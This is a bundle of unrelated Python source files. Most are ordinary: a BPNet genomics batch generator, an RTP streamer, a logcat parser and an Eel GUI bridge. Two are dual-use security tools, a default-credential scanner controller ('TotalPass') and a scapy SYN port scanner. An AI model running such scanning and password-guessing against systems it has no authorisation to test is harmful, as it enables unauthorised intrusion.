self._mode, pad_size, len(self._samples)))
def get_input_tasks(self):
"""
The dictionary of tasks loaded from the json file
input_config['data']
Returns:
dict: dictionary of input tasks
"""
return self._tasks
def get_unpadded_samples_len(self):
"""
The number of data samples before padding
Returns:
int: number of data samples before padding
"""
return self._unpadded_samples_size
def get_samples_len(self):
"""
The number of data samples used in batch generation
(after padding)
Returns:
int: number of data samples used in batch generation
"""
return self._samples_size
def len(self):
"""
The number of batches per epoch
Returns:
int: number of batches of data generated in each epoch
"""
return self._samples.shape[0] // self._batch_size
def _generate_batch(self, coords):
"""
Generate one batch of inputs and outputs
"""
raise NotImplementedError("Method not implemented. Used a "
"derived class.")
def get_name(self):
"""
Name of the sequence generator
"""
raise NotImplementedError("Method not implemented. Used a "
"derived class.")
def _get_negative_batch(self):
"""
Get chrom positions for the negative samples using
uniform random sampling from across the all chromosomes
in self._chroms
Returns:
pandas.DataFrame:
two column dataframe of chromosome positions with
'chrom' & 'pos' columns
"""
# Step 1: select chromosomes, using sampling weights
# according to sizes
chrom_df = self._chrom_sizes_df.sample(
n=int(self._batch_size * self._negative_sampling_rate),
weights=self._chrom_sizes_df.weights, replace=True)
# Step 2: generate 'n' random numbers where 'n' is the length
# of chrom_df
r = [random.random() for _ in range(chrom_df.shape[0])]
# Step 3. multiply the random numbers with the size column.
# Additionally, factor in the flank size and jitter while
# computing the position
chrom_df['pos'] = ((chrom_df['size'] - ((self._input_flank
+ self._max_jitter) * 2))
* r + self._input_flank
+ self._max_jitter).astype(int)
return chrom_df[['chrom', 'pos']]
def _proc_target(self, coords_df, mpq, proc_idx):
"""
Function that will be executed in a separate process.
Takes a dataframe of peak coordinates and parses them in
batches, to get one hot encoded sequences and corresponding
outputs, and adds the batches to the multiprocessing queue.
Optionally, samples negative locations and adds them to
each batch
Args:
coords_df (pandas.DataFrame): dataframe containing
the chrom & peak pos
mpq (multiprocessing.Queue): The multiprocessing queue
to hold the batches
"""
# divide the coordinates dataframe into batches
cnt = 0
for i in range(0, coords_df.shape[0], self._batch_size):
# we need to make sure we dont try to fetch
# data beyond the length of the dataframe
if (i + self._batch_size) > coords_df.shape[0]:
break
batch_df = coords_df.iloc[i:i + self._batch_size]
batch_df = batch_df.copy()
batch_df['status'] = 1
# add equal number of negative samples
if self._mode == "train" and \
self._sampling_mode == 'peaks' and \
self._negative_sampling_rate > 0.0:
neg_batch = self._get_negative_batch()
neg_batch['status'] = -1
batch_df = pd.concat([batch_df, neg_batch])
# generate a batch of one hot encoded sequences and
# corresponding outputs
batch = self._generate_batch(batch_df)
# add batch to the multiprocessing queue
mpq.put(batch)
cnt += 1
logging.debug("{} process {} put {} batches into mpq".format(
self._mode, proc_idx, cnt))
def _stealer(self, mpq, q, num_batches, thread_id):
"""
Thread target function to "get" (steal) from the
multiprocessing queue and "put" in the regular queue
Args:
mpq (multiprocessing.Queue): The multiprocessing queue
to steal from
q (Queue): The regular queue to put the batch into
num_batches (int): the number of batches to "steal"
from the mp queue
thread_id (int): thread id for debugging purposes
"""
for i in range(num_batches):
q.put(mpq.get())
logging.debug("{} stealer thread {} got {} batches from mpq".format(
self._mode, thread_id, num_batches))
def _epoch_run(self, data):
"""
Manage batch generation processes & threads
for one epoch
Args:
data (pandas.DataFrame): dataframe with 'chrom' &
'pos' columns
"""
# list of processes that are spawned
procs = []
# list of multiprocessing queues corresponding to each
# process
mp_queues = []
# list of stealer threads (that steal the items out of
# the mp queues)
threads = []
# the regular queue
q = Queue()
# to make sure we dont flood the user with warning messages
warning_dispatched = False
# number of data samples to assign to each processor
# (since we have already padded data len(data) is directly
# divisible by num_threads)
samples_per_processor = int(len(data) / self._num_threads)
# batches that will be generated by each process thread
num_batches = []
# spawn processes that will generate batches of data and "put"
# into the multiprocessing queues
for i in range(self._num_threads):
mpq = mp.Queue()
# give each process a slice of the dataframe of positives
df = data[i * samples_per_processor:
(i + 1) * samples_per_processor][['chrom', 'pos']]
# the last process gets the leftover data points
if i == (self._num_threads - 1):
df = pd.concat([df, data[(i + 1) * samples_per_processor:]])
num_batches.append(len(df) // self._batch_size)
if df.shape[0] != 0:
logging.debug("{} spawning process {}, df size {}, "
"sum(num_batches) {}".format(
self._mode, i, df.shape, sum(num_batches)))
# spawn and start the batch generation process
p = mp.Process(target=self._proc_target, args=[df, mpq, i])
p.start()
procs.append(p)
mp_queues.append(mpq)
else:
if not warning_dispatched:
logging.warn("One or more process threads are not being "
"assigned data for parallel batch "
"generation. You should reduce the number "
"of threads using the --threads option "
"for better performance. Inspect logs for "
"batch assignments.")
warning_dispatched = True
logging.debug("{} skipping process {}, df size {}, "
"num_batches {}".format(
self._mode, i, df.shape, sum(num_batches)))
procs.append(None)
mp_queues.append(None)
logging.debug("{} num_batches list {}".format(self._mode,
num_batches))
# the threads that will "get" from mp queues
# and put into the regular queue
# this speeds up yielding of batches, because "get"
# from mp queue is very slow
for i in range(self._num_threads):
# start a stealer thread only if data was assigned to
# the i-th process
if num_batches[i] > 0:
logging.debug("{} starting stealer thread {} [{}] ".format(
self._mode, i, num_batches[i]))
mp_q = mp_queues[i]
stealerThread = Thread(target=self._stealer,
args=[mp_q, q, num_batches[i], i])
stealerThread.start()
threads.append(stealerThread)
else:
threads.append(None)
logging.debug("{} skipping stealer thread {} ".format(
self._mode, i, num_batches))
return procs, threads, q, sum(num_batches)
def gen(self, epoch):
"""
Generator function to yield one batch of data
Args:
epoch (int): the epoch number
"""
if self._shuffle:
# shuffle at the beginning of each epoch
data = self._samples.sample(frac=1.0)
logging.debug("{} Shuffling complete".format(self._mode))
else:
data = self._samples
# spawn multiple processes to generate batches of data in
# parallel for each epoch
procs, threads, q, total_batches = self._epoch_run(data)
logging.debug("{} Batch generation for epoch {} started".format(
self._mode, epoch))
# yield the correct number of batches for each epoch
for j in range(total_batches):
batch = q.get()
yield batch
# wait for batch generation processes to finish once the
# required number of batches have been yielded
for j in range(self._num_threads):
if procs[j] is not None:
logging.debug("{} waiting to join process {}".format(
self._mode, j))
procs[j].join()
if threads[j] is not None:
logging.debug("{} waiting to join thread {}".format(
self._mode, j))
threads[j].join()
logging.debug("{} join complete for process {}".format(
self._mode, j))
logging.debug("{} Finished join for epoch {}".format(
self._mode, epoch))
logging.debug("{} Ready for next epoch".format(self._mode))
class MBPNetSequenceGenerator(MSequenceGenerator):
"""
Multi task batch data generation for training BPNet
on high-throughput sequencing data of various
geonmics assays
Args:
input_config (dict): python dictionary with information
about the input data. Contains the following keys -
*data (str)*
path to the json file containing task information.
See README for more information on the format of
the json file
*stranded (boolean)*
True if data is stranded
*has_control (boolean)*
True if control data has been included
batch_gen_params (dictionary): python dictionary with batch
generation parameters. Contains the following keys -
*input_seq_len (int)*
length of input DNA sequence
*output_len (int)*
length of output profile
*max_jitter (int)*
maximum value for randomized jitter to offset the
peaks from the exact center of the input
*rev_comp_aug (boolean)*
enable reverse complement augmentation
*negative_sampling_rate (float)*
the fraction of batch_size that determines how many
negative samples are added to each batch
*sampling_mode (str)*
the mode of sampling chromosome positions - one of
['peaks', 'sequential', 'random', 'manual']. In
'peaks' mode the data samples are fetched from the
peaks bed file specified in the json file
input_config['data']. In 'manual' mode, the bed
file containing the chromosome position information
is passed to the 'samples' argument of the class
*shuffle (boolean)*
specify whether input data is shuffled at the
begininning of each epoch
*mode (str)*
'train', 'val' or 'test'
*num_positions" (int)*
specify how many chromosome positions to sample if
sampling_mode is 'sequential' or 'random'. Can be
omitted if sampling_mode is "peaks", has no effect if
present.
*step_size (int)*
specify step size for sampling chromosome positions if
sampling_mode is "sequential". Can be omitted if
sampling_mode is "peaks" or "random", has no effect if
present.
reference_genome (str): the path to the reference genome
fasta file
chrom_sizes (str): path to the chromosome sizes file
chroms (str): the list of chromosomes that will be sampled
for batch generation
num_threads (int): number of parallel threads for batch
generation
epochs (int): number of iterations for looping over input
data
batch_size (int): size of each generated batch of data
samples (pandas.Dataframe): two column pandas dataframe
with chromosome position information. Required column
names are column 1:'chrom', column 2:'pos'. Use this
parameter if you set batch_gen_params['sampling_mode']
to 'manual'. default = None
kwargs (dictionary): python dictionary containing
parameters specific to BPNet. Contains the following
keys -
*name (str)*
model architecture name
*filters (int)*
number of filters for BPNet
*control_smoothing (list)*
nested list of gaussiam smoothing parameters. Each
inner list has two values - [sigma, window_size] for
supplemental control tracks
**Members**
IGNORE_FOR_SPHINX_DOCS:
Attributes:
_control_smoothing (list): nested list of gaussiam smoothing
parameters. Each inner list has two values -
[sigma, window_size] for supplemental control tracks
IGNORE_FOR_SPHINX_DOCS
"""
def __init__(self, input_config, batch_gen_params, reference_genome,
chrom_sizes, chroms, num_threads=10, epochs=100,
batch_size=64, samples=None, **kwargs):
# name of the generator class
self.name = "BPNet"
# call base class constructor
super().__init__(input_config, batch_gen_params, reference_genome,
chrom_sizes, chroms, num_threads, epochs, batch_size,
samples)
if 'control_smoothing' not in kwargs:
raise NoTracebackException(
"Key not Found: missing 'control_smoothing' parameter")
#: nested list of gaussiam smoothing parameters. Each inner list
#: has two values - [sigma, window_size] for supplemental
#: control control tracks
self._control_smoothing = kwargs['control_smoothing']
def _generate_batch(self, coords):
"""Generate one batch of inputs and outputs for training BPNet
For all coordinates in "coords" fetch sequences &
one hot encode the sequences. Fetch corresponding
signal values (for e.g. from a bigwig file).
Package the one hot encoded sequences and the output
values as a tuple.
Args:
coords (pandas.DataFrame): dataframe with 'chrom',
'pos' & 'status' columns specifying the chromosome,
thecoordinate and whether the loci is a positive(1)
or negative sample(-1)
Returns:
tuple:
When 'mode' is 'train' or 'val' a batch tuple
with one hot encoded sequences and corresponding
outputs and when 'mode' is 'test' tuple of
cordinates & the inputs
"""
# reference file to fetch sequences
fasta_ref = pyfaidx.Fasta(self._reference)
# Initialization
# (batch_size, output_len, 1 + #smoothing_window_sizes)
control_profile = np.zeros((coords.shape[0], self._output_flank * 2,
1 + len(self._control_smoothing)),
dtype=np.float32)
# (batch_size)
control_profile_counts = np.zeros((coords.shape[0]),
dtype=np.float32)
# in 'test' mode we pass the true profile as part of the
# returned tuple from the batch generator
if self._mode == "train" or self._mode == "val" or \
self._mode == "test":
# (batch_size, output_len, #tasks)
profile = np.zeros((coords.shape[0], self._output_flank * 2,
self._num_tasks), dtype=np.float32)
# (batch_size, #tasks)
profile_counts = np.zeros((coords.shape[0], self._num_tasks),
dtype=np.float32)
# if reverse complement augmentation is enabled then double the sizes
if self._mode == "train" and self._rev_comp_aug:
control_profile = control_profile.repeat(2, axis=0)
control_profile_counts = control_profile_counts.repeat(2, axis=0)
profile = profile.repeat(2, axis=0)
profile_counts = profile_counts.repeat(2, axis=0)
# list of sequences in the batch, these will be one hot
# encoded together as a single sequence after iterating
# over the batch
sequences = []
# list of chromosome start/end coordinates
# useful for tracking test batches
coordinates = []
# open all the control bigwig files and store the file
# objects in a dictionary
control_files = {}
for task in self._tasks:
# the control is not necessary
if 'control' in self._tasks[task]:
control_files[task] = pyBigWig.open(
self._tasks[task]['control'])
# in 'test' mode we pass the true profile as part of the
# returned tuple from the batch generator
if self._mode == "train" or self._mode == "val" or \
self._mode == "test":
# open all the required bigwig files and store the file
# objects in a dictionary
signal_files = {}
for task in self._tasks:
signal_files[task] = pyBigWig.open(self._tasks[task]['signal'])
# iterate over the batch
rowCnt = 0
for _, row in coords.iterrows():
# randomly set a jitter value to move the peak summit
# slightly away from the exact center
jitter = 0
if self._mode == "train" and self._max_jitter:
jitter = random.randint(-self._max_jitter, self._max_jitter)
# Step 1 get the sequence
chrom = row['chrom']
# we use self._input_flank here and not self._output_flank because
# input_seq_len is different from output_len
start = row['pos'] - self._input_flank + jitter
end = row['pos'] + self._input_flank + jitter
seq = fasta_ref[chrom][start:end].seq.upper()
# collect all the sequences into a list
sequences.append(seq)
start = row['pos'] - self._output_flank + jitter
end = row['pos'] + self._output_flank + jitter
# collect all the start/end coordinates into a list
# we'll send this off along with 'test' batches
coordinates.append((chrom, start, end))
# iterate over each task
for task in self._tasks:
# identifies the +/- strand pair
task_id = self._tasks[task]['task_id']
# the strand id: 0-positive, 1-negative
# easy to index with those values
strand = self._tasks[task]['strand']
# Step 2. get the control values
if task in control_files:
control_values = control_files[task].values(
chrom, start, end)
# replace nans with zeros
if np.any(np.isnan(control_values)):
control_values = np.nan_to_num(control_values)
# update row in batch with the control values
# the values are summed across all tasks
# the axis = 1 dimension accumulates the sum
# there are 'n' copies of the sum along axis = 2,
# n = #smoothing_windows
control_profile[rowCnt, :, :] += np.expand_dims(
control_values, axis=1)
# in 'test' mode we pass the true profile as part of the
# returned tuple from the batch generator
if self._mode == "train" or self._mode == "val" or \
self._mode == "test":
# Step 3. get the signal values
# fetch values using the pyBigWig file objects
values = signal_files[task].values(chrom, start, end)
# replace nans with zeros
if np.any(np.isnan(values)):
values = np.nan_to_num(values)
# update row in batch with the signal values
if self._stranded:
profile[rowCnt, :, task_id * 2 + strand] = values
else:
profile[rowCnt, :, task_id] = values
rowCnt += 1
# Step 4. reverse complement augmentation
if self._mode == "train" and self._rev_comp_aug:
# Step 4.1 get list of reverse complement sequences
rev_comp_sequences = \
sequtils.reverse_complement_of_sequences(sequences)
# append the rev comp sequences to the original list
sequences.extend(rev_comp_sequences)
# Step 4.2 reverse complement of the control profile
control_profile[rowCnt:, :, :] = \
sequtils.reverse_complement_of_profiles(
control_profile[:rowCnt, :, :], self._stranded)
# Step 4.3 reverse complement of the signal profile
profile[rowCnt:, :, :] = \
sequtils.reverse_complement_of_profiles(
profile[:rowCnt, :, :], self._stranded)
# Step 5. one hot encode all the sequences in the batch
if len(sequences) == profile.shape[0]:
X = sequtils.one_hot_encode(sequences, self._input_flank * 2)
else:
raise NoTracebackException(
"Unable to generate enough sequences for the batch")
# we can perform smoothing on the entire batch of control values
for i in range(len(self._control_smoothing)):
sigma = self._control_smoothing[i][0]
window_size = self._control_smoothing[i][1]
# its i+1 because at index 0 we have the original
# control
control_profile[:, :, i + 1] = utils.gaussian1D_smoothing(
control_profile[:, :, i + 1], sigma, window_size)
# log of sum of control profile without smoothing (idx = 0)
control_profile_counts = np.log(
np.sum(control_profile[:, :, 0], axis=-1) + 1)
# in 'train' and 'val' mode we need input and output
# dictionaries
if self._mode == "train" or self._mode == 'val':
# we can now sum the profiles for the entire batch
profile_counts = np.log(np.sum(profile, axis=1) + 1)
# return a tuple of input and output dictionaries
# 'coordinates' and 'status are not inputs to the model,
# so you will see a warning about unused inputs while
# training. It's safe to ignore the warning
# We pass 'coordinates' so we can track the exact
# coordinates of the inputs (because jitter is random)
# 'status' refers to whether the data sample is a +ve (1)
# or -ve (-1) example and is used by the attribution
# prior loss function
return ({'coordinates': coordinates,
'status': coords['status'].values,
'sequence': X,
'control_profile': control_profile,
'control_logcount': control_profile_counts},
{'profile_predictions': profile,
'logcount_predictions': profile_counts})
# in 'test' mode return a tuple of cordinates, true profiles
# & the input dictionary
return (coordinates, profile,
{'sequence': X,
'control_profile': control_profile,
'control_logcount': control_profile_counts})
def list_generator_names():
"""
List all available sequence generators that are derived
classes of the base class MSequenceGenerator
Returns:
list: list of sequence generator names
"""
generator_names = []
for c in MSequenceGenerator.__subclasses__():
result = re.search('M(.*)SequenceGenerator', c.__name__)
generator_names.append(result.group(1))
return generator_names
def find_generator_by_name(generator_name):
"""
Get the sequence generator class name given its name
Returns:
str: sequence generator class name
"""
for c in MSequenceGenerator.__subclasses__():
result = re.search('M(.*)SequenceGenerator', c.__name__)
if generator_name == result.group(1):
return c.__name__
|
core.py | #!/usr/bin/env python3
# -*- coding=utf-8 -*-
"""
核心控制器
1. 解析命令
2. 调用对应插件
3. 返回结果
"""
import sys
import queue
import logging
import click
from threading import Thread
from prettytable import PrettyTable
from . import addons
from .settings import opts
from .passwd import Passwd
class TPCore(object):
"""
核心控制器
"""
logger = logging.getLogger("TotalPass")
_q_scanners = queue.Queue()
def __init__(self):
pass
# self.logger = logging.getLogger("TotalPass")
# self._q_scanners = queue.Queue()
@classmethod
def anyscan(cls):
click.echo("Checking if the target ports are open...")
scanners = []
for t in opts.targets:
if t.alive():
scanners += t.load_scanners()
click.echo("\nLoaded %i credential profiles." % len(opts.passwds))
click.echo("Loaded %i unique scanners.\n" % len(scanners))
for s in scanners:
cls._q_scanners.put(s)
tasks = []
for i in range(opts.threads):
t = Thread(target=cls._scan_worker)
t.start()
tasks.append(t)
cls._q_scanners.join()
opts.running = False
for i in range(opts.threads):
cls._q_scanners.put(None)
for t in tasks:
t.join()
@classmethod
def _scan_worker(cls):
while opts.running and not cls._q_scanners.empty():
s = cls._q_scanners.get()
if s is None:
break
s.scan()
cls._q_scanners.task_done()
@classmethod
def anysearch(cls, keywords, verbose):
""" 从密码库中搜索密码 """
click.echo("Searching passwords from profiles...")
passwds = Passwd.load()
matched = []
click.echo("[+] Loaded %s passwd profiles." % len(passwds))
if verbose < 1:
for passwd in passwds:
if passwd.match(keywords):
matched += passwd.creds()
matched = set(matched)
print("\n")
for x in matched:
print(x)
print("\n")
elif verbose < 2:
for passwd in passwds:
if passwd.match(keywords):
matched += passwd.cred_rows()
pt = PrettyTable(["Username", "Password", "Name"])
pt.align["Name"] = "l"
for row in matched:
pt.add_row(row)
print(pt.get_string())
else:
for passwd in passwds:
if passwd.match(keywords):
print("\n-----------------------------")
print(passwd.yaml())
matched.append(passwd.yaml())
if matched:
click.secho("[+] Found %s passwd." % len(matched), fg="green")
else:
click.secho("[x] No matching passwd profile found.", fg="red")
@classmethod
def anyupdate(cls):
""" 从 cirt.net 更新密码库"""
click.echo("Updating passwords from cirt.net...")
from .cirt import CirtPass
try:
CirtPass.update()
click.secho("[+] Passwords update completed.", fg="green")
except Exception as e:
click.secho("[x] Passwords update failed.", fg="red")
print("%s Exception: %s" % (type(e).__name__, str(e)))
@classmethod
def anylist(cls):
""" 列出所有支持的设备信息和服务类型 """
click.echo("Loading passwords from profiles...")
pt = PrettyTable(["Name", "Category", "Port", "Passwd Count"])
pt.align["Name"] = "l"
table = Passwd.table()
for row in table:
pt.add_row(row)
print(pt.get_string())
click.secho("[+] Loaded %s passwd profiles." % len(table), fg="green")
|
_debugger_case_multiprocessing.py | import time
import multiprocessing
def run(name):
print("argument: ", name) # break 1 here
if __name__ == '__main__':
multiprocessing.Process(target=run, args=("argument to run method",)).start()
print('TEST SUCEEDED!') # break 2 here
|
Streamer.py | import socket, time, threading, sys
from protocols.RTP import RTP
from .Camera import Camera
from .Mic import Mic
class Streamer:
DEFAULT_CHUNK_SIZE = 4096
class MEDIA_TYPE:
STRING = 0
def __init__(self, client_ip):
# , client_port, file_path
self.client_ip = client_ip
self.rtp_sockets = dict()
self.devices = dict()
self.threads = dict()
self.available_devices = {"camera": Camera, "mic": Mic}
def start_stream(self, device):
print("Starting streaming %s" % device)
self.threads[device] = [
threading.Thread(target=self.stream, args=(device,)),
True,
]
self.threads[device][0].start()
print("Daemon %s" % device)
def stream(self, device):
print("Start Streaming video to target client")
while self.threads[device][1]:
# frame = self._video_stream.get_next_frame()
# frame_number = self._video_stream.current_frame_number
frame = self.devices[device].get_frame()
if frame:
rtp_packet = RTP(
payload_type=self.MEDIA_TYPE.STRING,
seq_num=0,
timestamp=int(time.time()),
payload=frame,
)
# print(f"Sending packet #{frame_number}")
# print('Packet header:')
# rtp_packet.print_header()
packet = rtp_packet.get_packet()
self.send_rtp_packet(device, packet)
if device == "mic":
time.sleep(0.0095)
else:
time.sleep(0.1)
def send_rtp_packet(self, device, packet):
rtp_socket, client_port = self.rtp_sockets[device]
print(device, client_port)
# if device == 'mic':
# return
# print(device, "sending", packet)
to_send = packet[:]
while to_send:
try:
rtp_socket.sendto(
to_send[: self.DEFAULT_CHUNK_SIZE], (self.client_ip, client_port)
)
time.sleep(0.0035)
except socket.error as e:
print(f"failed to send rtp packet: {e}")
return
to_send = to_send[self.DEFAULT_CHUNK_SIZE :]
def add_device(self, port, device):
if device not in self.available_devices:
return
self.devices[device] = self.available_devices[device]()
print(self.devices)
print("Add device: %s" % device)
port = int(port)
self.rtp_sockets[device] = (
socket.socket(socket.AF_INET, socket.SOCK_DGRAM),
port,
)
print("Target: %s:%d" % (self.client_ip, port))
if __name__ == "__main__":
video_streamer = VideoStreamer("video.mp4")
|
op_support.py | import multiprocessing
import os
import shlex
import guild.system
import guild.util
def python_cmd_for_spec(spec, section):
spec_parts = shlex.split(spec)
script = _resolve_script_path(spec_parts[0], section.project.dir)
spec_args = spec_parts[1:]
flags = section.all_flags()
flags.sort()
return ["python", "-u", script] + spec_args + _flag_args(flags)
def _resolve_script_path(script, project_dir):
script_path = _script_path_for_project_dir(script, project_dir)
return guild.util.find_apply(
[_explicit_path,
_path_missing_py_ext,
_unmodified_path], script_path)
def _script_path_for_project_dir(script, project_dir):
rel_path = os.path.join(project_dir, script)
if project_dir == ".":
return rel_path
else:
return os.path.abspath(rel_path)
def _explicit_path(path):
return path if os.path.isfile(path) else None
def _path_missing_py_ext(part_path):
return _explicit_path(part_path + ".py")
def _unmodified_path(val):
return val
def _flag_args(flags):
args = []
for name, val in flags:
args.append("--" + name)
args.append(str(val))
return args
def base_env():
return {
"GPU_COUNT": str(guild.system.gpu_count())
}
def rundir_env():
env = base_env()
env.update({
"RUNDIR": "%(opdir)s"
})
return env
def start_task(target, args, op):
task_stop_conn, parent_stop_conn = multiprocessing.Pipe()
p_args = [op, task_stop_conn] + args
task = multiprocessing.Process(target=target, args=p_args)
task.start()
return (task, parent_stop_conn)
def stop_task(task_, grace_period):
task, stop_conn = task_
if task.is_alive():
stop_conn.send("stop")
stop_conn.poll(grace_period)
if task.is_alive():
task.terminate()
def task_pipe():
return multiprocessing.Pipe()
|
Multithreaded_Portscanner.py | #!/bin/bash/python
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
import socket
import time
import sys, signal
import os
from scapy.all import *
from Queue import Queue
from threading import Thread
from subprocess import PIPE, Popen, call
date = Popen('date +"%m-%d-%y"', shell = True, stdout = PIPE).stdout.read().split('\n')[0]
c_time = Popen("date | awk '{print $4}'", shell = True, stdout = PIPE).stdout.read().split('\n')[0]
file = open('bin/logs/'+str(date)+'/Port_sc.log','a')
file.write('Port Scanner '+str(time.ctime())+'\n\n')
os.system('clear')
print "\n\n\n\033[1m\033[36m PORT SCANNER\033[0;0m\n"
try:
sys.stdout.write(" [*]\033[94m Internet Connection Status \033[0;0m :")
sys.stdout.flush()
if socket.gethostbyname('www.google.com'):
file.write('Connected: '+str(time.ctime()))
sys.stdout.write("\033[92m CONNECTED\033[0;0m\n\n")
except:
sys.stdout.write("\033[91m NOT CONNECTED\033[0;0m\n")
file.write('Connection Lost: '+str(time.ctime()))
sys.stdout.write(" [-] Please Check Your Internet Connection!\n\n")
time.sleep(2)
os.system('clear; python main/MainWindow.py')
def run(q,urlip):
try:
file.write('Scanning (0) : '+str(time.ctime()))
while True:
try:
port=q.get()
response = sr1(IP(dst=urlip)/TCP(dport=port, flags='S'),verbose=False, timeout=1,retry=3)
if response:
if response[TCP].flags == 18:
try:
s=socket.getservbyport(port)
sys.stdout.write(" Open Port: [ "+str(port)+" ] : "+str(s)+"\n")
data.write(str(port)+' : '+str(s)+'\n')
except:
sys.stdout.write(" Open Port: [ "+str(port)+" ] : NA \n")
data.write(str(port)+' : '+str(s)+'\n')
except Exception as e:
pass
q.task_done()
file.write('Scanning (1): '+str(time.ctime()))
except Exception:
print ' Port Scanner Has\033[91m Stopped\033[0;0m Working!'
data.close()
file.close()
os.kill(os.getpid(), signal.SIGKILL)
q = Queue(maxsize =0)
threads = 40
try:
urlip=raw_input(" Enter URL or IP To Scan : ")
startport=int(input(" Start Scan From Port Number : "))
endport=int(input(" Scan Upto Port Number : "))
#data.write(str(urlip)+'\n'+str(startport)+'\n'+str(endport)+'\n\n')
except Exception:
print '\n'
os.system('clear')
sys.stdout.write("\n \033[91mINVALID\033[0;0m Input, Please Try Again!")
sys.stdout.flush()
os.system('python main/Multithreaded_Portscanner.py')
print "\n \033[94m [*] SCANNING FOR OPEN PORTS...\033[0;0m \n"
for j in range(startport,endport+1):
q.put(j)
data = open('bin/data/'+str(date)+'/port_sc/Port_sc_'+str(c_time)+'.log','a')
data.write('Port Scanner '+str(time.ctime())+'\n\n')
for i in range(threads):
thread = Thread(target=run, args=(q,urlip,))
thread.setDaemon(True)
thread.start()
q.join()
data.write('\n--------------END-------------')
data.close()
file.close()
print "\n \033[92mSCAN COMPLETED\033[0;0m"
|
logcat.py | from threading import Thread
from adb import PrematureEOFError
import logging
from functools import wraps
from logcat_parser import LogcatStreamParser, MessageParser
def cb_wrap(cb):
@wraps(cb)
def wrap(*largs, **kwargs):
try:
return cb(*largs, **kwargs)
except:
logging.exception("(in tracker callback)")
return wrap
class LogcatParser:
def __init__(self, conn):
self.conn = conn
def readLine(self):
return self.conn.read(128)
class MyLogcatStreamParser(LogcatStreamParser):
def __init__(self, conn, lah=b''):
self._look_ahead = lah
super().__init__(conn)
def _read_raw(self, size):
return self._stream.read(size)
def _read_one(self):
if self._look_ahead:
if self._look_ahead != b'\r':
ret = self._look_ahead
self._look_ahead = b''
return ret
else:
cur = self._look_ahead
self._look_ahead = b''
else:
cur = self._stream.read(1)
if cur != b'\r':
return cur
else:
cur2 = self._stream.read(1)
if cur2 == b'\n':
return b'\n'
else:
self._look_ahead = cur2
return cur
def read(self, size, timeout=None):
h = self._look_ahead
ret = b''.join([self._read_one() for i in range(size)])
return ret
class MyMessageParser(MessageParser):
def __init__(self, parser):
super().__init__(parser)
self._data = dict(parser.items())
self._data.update({
'priority': self._priority,
'tag': self._tag,
'message': self._message,
})
class FpWrapper:
def __init__(self, fp):
self.fp = fp
self._buf = b''
self._off = 0
self._eof = False
def _read_chunk(self):
buf = self.fp.read(4096)
if not buf:
self._eof = True
return
if self._off:
self._buf = self._buf[self._off:]
self._off = 0
self._buf += buf
def read(self, bytes):
while len(self._buf) < self._off + bytes and not self._eof:
self._read_chunk()
ret = self._buf[self._off: self._off + bytes]
self._off += len(ret)
return ret
class Logcat:
def __init__(self, conn, cb):
self.cb = cb_wrap(cb)
self.conn = conn
self.fp = FpWrapper(conn)
thread = Thread(target=self._readdevices_loop, name="Logcat")
thread.setDaemon(True)
thread.start()
def _readdevices_loop(self):
try:
while 1:
_parser = MyLogcatStreamParser(self.fp)
message = MyMessageParser(_parser[0])
if not self.cb({"what": "log", "msg": message._data}):
break
except PrematureEOFError:
pass
finally:
self.cb({"what": "eof"})
self.conn.close() |
eelinterface.py | import os
import threading
import traceback
from typing import Dict, List
import eel
from src.sammie.py.ModuleConnector import ModuleConnector
from src.sammie.py.SessionData import SessionData
from src.py.__config import getModuleConnector
from src.sammie.py.modules.FileLoader import FileLoader
from src.sammie.py.modules.ModuleBase import ModuleBase
executionKey:int = 0
log = True
#Stores module instances by their ID
modulesById: Dict[str, ModuleBase] = {}
#Stores module instances by their Thread Execution key, allows to kill if necessary
modulesByExecutionKey: Dict[str, ModuleBase] = {}
#Sessiondata stores all the information produced by Modules
session: SessionData = SessionData()
#Module Connector initializes modules, aggregators, loaders
moduleConnector:ModuleConnector = getModuleConnector()
#Loader is a speicifc module, that loads files
fileLoader: FileLoader = FileLoader(session, moduleConnector)
#Stores parameters passed to newly initialized modules/steps in the pipeline
pipelineParams: Dict = {}
def getModule(moduleID: str, moduleName: str):
params = pipelineParams[moduleID]
if moduleID not in modulesById:
modulesById[moduleID] = moduleConnector.initializeModule(moduleID,moduleName,params,session)
return modulesById[moduleID]
def startThreadInModule(m:ModuleBase, asyncKey:int, params):
print("[Eel]: Started Run in separate thread with execKey %s"%(asyncKey))
m.startingRun() # indicate that we started, important to be able to abort
try:
res = m.run(*params)
except Exception as e:
traceback.print_exc()
print("[Eel]: Error or Abort in Thread %s"%(asyncKey))
eel.asyncError(asyncKey, {'errorText':str(e)})
else:
print("[Eel]: Ending Thread %s"%(asyncKey))
eel.asyncFinished(asyncKey,res)
@eel.expose
def loadInputFile(pipelinekey:str, path:str, loaderName:str, loaderArgs:Dict, batchPreviewIdx:int = -1):
"""
Loads an file by path into the input of the pipeline
Args:
pipelinekey (str): The key to recognise this input by
path (str): Full Path to load from
loaderName (str): See src/py/loaders/fileloaders.py for a list of loader funcitons
loaderArgs (Dict): Any arguments to be passed to the loader, set in JS if necessary
batchPreviewIdx (int): The batch number this preview is part of. giving a batchPReview will identify this data as simply preview and it will not be loaded into the session.
Returns: a JS object with a preview URL and some metadata on this file.
"""
print('[Eel]: Loading Input %s: %s (preview #%d):' % (pipelinekey,path,batchPreviewIdx))
if batchPreviewIdx == -1:
return fileLoader.loadFile(pipelinekey,path,loaderName,loaderArgs)
return fileLoader.loadFilePreview(pipelinekey,batchPreviewIdx,path,loaderName,loaderArgs)
@eel.expose
def exportData(moduleID:str, pipelinekey:str, path:str, overwrite:bool,exporterArgs:Dict = None):
if not overwrite and os.path.exists(path):
raise RuntimeError('File %s already exists'%path)
modulesById[moduleID].exportData(pipelinekey,path,**exporterArgs)
return True
@eel.expose
def getAggregateDataInfo(aggregatorID:str, path:str, exporterArgs:Dict = None):
return moduleConnector.getAggregatorFileInfo(aggregatorID,path).toDict()
@eel.expose
def resetAggregateData(aggregatorID:str, path:str):
return moduleConnector.resetAggregatorFile(aggregatorID, path)
@eel.expose
def exportAggregateData(aggregatorID:str, path:str, batchnum:int, exporterArgs:Dict = None):
return moduleConnector.runAggregator(aggregatorID, path,session,modulesById,batchnum,exporterArgs).toDict()
@eel.expose
def getBatchGlobs(patterns:List[str],allowedExtensions:List[List[str]]):
return fileLoader.getFileGlob(patterns,allowedExtensions)
@eel.expose
def getFolderContents(folder:str, extenstions:List[str]):
return fileLoader.getFolderContents(folder,extenstions)
@eel.expose
def onNewPipelineLoaded(pipelineID:str, pipelineParamsByModuleID:Dict = None):
